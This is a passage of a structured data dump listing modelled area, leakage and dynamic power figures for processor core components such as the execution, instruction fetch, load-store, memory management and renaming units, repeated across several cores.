'Memory Management Unit/Itlb/Runtime Dynamic': 0.0195164,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.445849,
'Memory Management Unit/Runtime Dynamic': 0.0776186,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 18.0036,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.263579,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0105064,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0774821,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.351567,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.91456,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0817799,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.266922,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.51822,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.157556,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.254131,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.128277,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.539964,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.100749,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.88915,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0979028,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00660859,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.075292,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0488746,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.173195,
'Execution Unit/Register Files/Runtime Dynamic': 0.0554832,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.179069,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.467607,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.73535,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 1.72961e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 1.72961e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.50842e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 5.8499e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000702087,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000751764,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000165144,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0469844,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.98861,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.115621,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.15958,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.35217,
'Instruction Fetch Unit/Runtime Dynamic': 0.323102,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0331364,
'L2/Runtime Dynamic': 0.00896434,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.21612,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.961208,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0640254,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0640254,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.51846,
'Load Store Unit/Runtime Dynamic': 1.34098,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.157876,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.315752,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0560306,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0565138,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.185821,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0189973,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.43818,
'Memory Management Unit/Runtime Dynamic': 0.075511,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 17.8206,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.257538,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0102427,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.0754401,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.34322,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 3.82714,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328},
{'Area': 32.0201,
'Execution Unit/Area': 7.68434,
'Execution Unit/Complex ALUs/Area': 0.235435,
'Execution Unit/Complex ALUs/Gate Leakage': 0.0132646,
'Execution Unit/Complex ALUs/Peak Dynamic': 0.0820548,
'Execution Unit/Complex ALUs/Runtime Dynamic': 0.267138,
'Execution Unit/Complex ALUs/Subthreshold Leakage': 0.20111,
'Execution Unit/Complex ALUs/Subthreshold Leakage with power gating': 0.0754163,
'Execution Unit/Floating Point Units/Area': 4.6585,
'Execution Unit/Floating Point Units/Gate Leakage': 0.0656156,
'Execution Unit/Floating Point Units/Peak Dynamic': 0.52011,
'Execution Unit/Floating Point Units/Runtime Dynamic': 0.304033,
'Execution Unit/Floating Point Units/Subthreshold Leakage': 0.994829,
'Execution Unit/Floating Point Units/Subthreshold Leakage with power gating': 0.373061,
'Execution Unit/Gate Leakage': 0.120359,
'Execution Unit/Instruction Scheduler/Area': 1.66526,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Area': 0.275653,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Gate Leakage': 0.000977433,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Peak Dynamic': 1.04181,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Runtime Dynamic': 0.157871,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage': 0.0143453,
'Execution Unit/Instruction Scheduler/FP Instruction Window/Subthreshold Leakage with power gating': 0.00810519,
'Execution Unit/Instruction Scheduler/Gate Leakage': 0.00568913,
'Execution Unit/Instruction Scheduler/Instruction Window/Area': 0.805223,
'Execution Unit/Instruction Scheduler/Instruction Window/Gate Leakage': 0.00414562,
'Execution Unit/Instruction Scheduler/Instruction Window/Peak Dynamic': 1.6763,
'Execution Unit/Instruction Scheduler/Instruction Window/Runtime Dynamic': 0.25464,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage': 0.0625755,
'Execution Unit/Instruction Scheduler/Instruction Window/Subthreshold Leakage with power gating': 0.0355964,
'Execution Unit/Instruction Scheduler/Peak Dynamic': 3.82262,
'Execution Unit/Instruction Scheduler/ROB/Area': 0.584388,
'Execution Unit/Instruction Scheduler/ROB/Gate Leakage': 0.00056608,
'Execution Unit/Instruction Scheduler/ROB/Peak Dynamic': 1.10451,
'Execution Unit/Instruction Scheduler/ROB/Runtime Dynamic': 0.128534,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage': 0.00906853,
'Execution Unit/Instruction Scheduler/ROB/Subthreshold Leakage with power gating': 0.00364446,
'Execution Unit/Instruction Scheduler/Runtime Dynamic': 0.541044,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage': 0.0859892,
'Execution Unit/Instruction Scheduler/Subthreshold Leakage with power gating': 0.047346,
'Execution Unit/Integer ALUs/Area': 0.47087,
'Execution Unit/Integer ALUs/Gate Leakage': 0.0265291,
'Execution Unit/Integer ALUs/Peak Dynamic': 0.100818,
'Execution Unit/Integer ALUs/Runtime Dynamic': 0.101344,
'Execution Unit/Integer ALUs/Subthreshold Leakage': 0.40222,
'Execution Unit/Integer ALUs/Subthreshold Leakage with power gating': 0.150833,
'Execution Unit/Peak Dynamic': 4.89238,
'Execution Unit/Register Files/Area': 0.570804,
'Execution Unit/Register Files/Floating Point RF/Area': 0.208131,
'Execution Unit/Register Files/Floating Point RF/Gate Leakage': 0.000232788,
'Execution Unit/Register Files/Floating Point RF/Peak Dynamic': 0.0982599,
'Execution Unit/Register Files/Floating Point RF/Runtime Dynamic': 0.00662181,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage': 0.00399698,
'Execution Unit/Register Files/Floating Point RF/Subthreshold Leakage with power gating': 0.00176968,
'Execution Unit/Register Files/Gate Leakage': 0.000622708,
'Execution Unit/Register Files/Integer RF/Area': 0.362673,
'Execution Unit/Register Files/Integer RF/Gate Leakage': 0.00038992,
'Execution Unit/Register Files/Integer RF/Peak Dynamic': 0.0754737,
'Execution Unit/Register Files/Integer RF/Runtime Dynamic': 0.0489723,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage': 0.00614175,
'Execution Unit/Register Files/Integer RF/Subthreshold Leakage with power gating': 0.00246675,
'Execution Unit/Register Files/Peak Dynamic': 0.173734,
'Execution Unit/Register Files/Runtime Dynamic': 0.0555941,
'Execution Unit/Register Files/Subthreshold Leakage': 0.0101387,
'Execution Unit/Register Files/Subthreshold Leakage with power gating': 0.00423643,
'Execution Unit/Results Broadcast Bus/Area Overhead': 0.0390912,
'Execution Unit/Results Broadcast Bus/Gate Leakage': 0.00537402,
'Execution Unit/Results Broadcast Bus/Peak Dynamic': 0.17952,
'Execution Unit/Results Broadcast Bus/Runtime Dynamic': 0.468423,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage': 0.081478,
'Execution Unit/Results Broadcast Bus/Subthreshold Leakage with power gating': 0.0305543,
'Execution Unit/Runtime Dynamic': 1.73758,
'Execution Unit/Subthreshold Leakage': 1.79543,
'Execution Unit/Subthreshold Leakage with power gating': 0.688821,
'Gate Leakage': 0.368936,
'Instruction Fetch Unit/Area': 5.85939,
'Instruction Fetch Unit/Branch Predictor/Area': 0.138516,
'Instruction Fetch Unit/Branch Predictor/Chooser/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Chooser/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Chooser/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Chooser/Runtime Dynamic': 1.78875e-05,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Chooser/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/Gate Leakage': 0.000757657,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Area': 0.0435221,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Gate Leakage': 0.000278362,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Peak Dynamic': 0.0168831,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Runtime Dynamic': 1.78875e-05,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage': 0.00759719,
'Instruction Fetch Unit/Branch Predictor/Global Predictor/Subthreshold Leakage with power gating': 0.0039236,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Area': 0.0257064,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 1.56194e-05,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 6.06807e-06,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.000703491,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.000754886,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.000170095,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0470783,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 2.99459,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.115865,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.159899,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 5.35843,
'Instruction Fetch Unit/Runtime Dynamic': 0.323768,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0326988,
'L2/Runtime Dynamic': 0.00866286,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 3.21697,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.961146,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.064053,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0640529,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.51945,
'Load Store Unit/Runtime Dynamic': 1.34109,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.157944,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.315887,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0560547,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.056531,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
